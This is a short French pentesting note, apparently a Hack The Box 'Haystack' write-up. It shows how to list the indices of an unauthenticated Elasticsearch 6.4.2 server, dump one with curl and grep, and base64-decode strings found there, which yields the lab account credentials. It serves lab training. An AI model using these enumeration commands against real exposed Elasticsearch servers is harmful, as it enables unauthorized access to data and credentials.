Port 9200 - Pentesting Elasticsearch

Elasticsearch est un moteur de recherche et d'analyse en temps réel, utilisé pour indexer et rechercher rapidement de grands volumes de données. Il s'intègre dans le stack ELK pour offrir des fonctionnalités avancées de visualisation et d'analyse des données.

ElasticSearch - Fuite d'Informations

Le port 9200 héberge ElasticSearch en version 6.4.2.

En accédant à l'URL /_cat/indices?, nous obtenons une liste d'indices avec leurs UUID. Pour extraire le contenu d'un indice, nous utilisons l'URL suivante :

http://haystack.htb:9200/<index>/_search?pretty=true&size=1000

Filtrage des Données avec Curl

En utilisant l'indice quotes et en filtrant sur le mot clé clave, nous trouvons des informations pertinentes :

curl -s -X GET "http://haystack.htb:9200/quotes/_search?pretty=true&size=1000" | jq | grep -Ei "clave"

Décodage des Chaînes Encodées en base64

Nous obtenons deux chaînes encodées en base64 qui, une fois décodées, révèlent les informations d'identification :

echo -n "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d; echo
echo -n "dXNlcjogc2VjdXJpdHkg" | base64 -d; echo

Utilisateur : security Mot de Passe : spanish.is.key

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?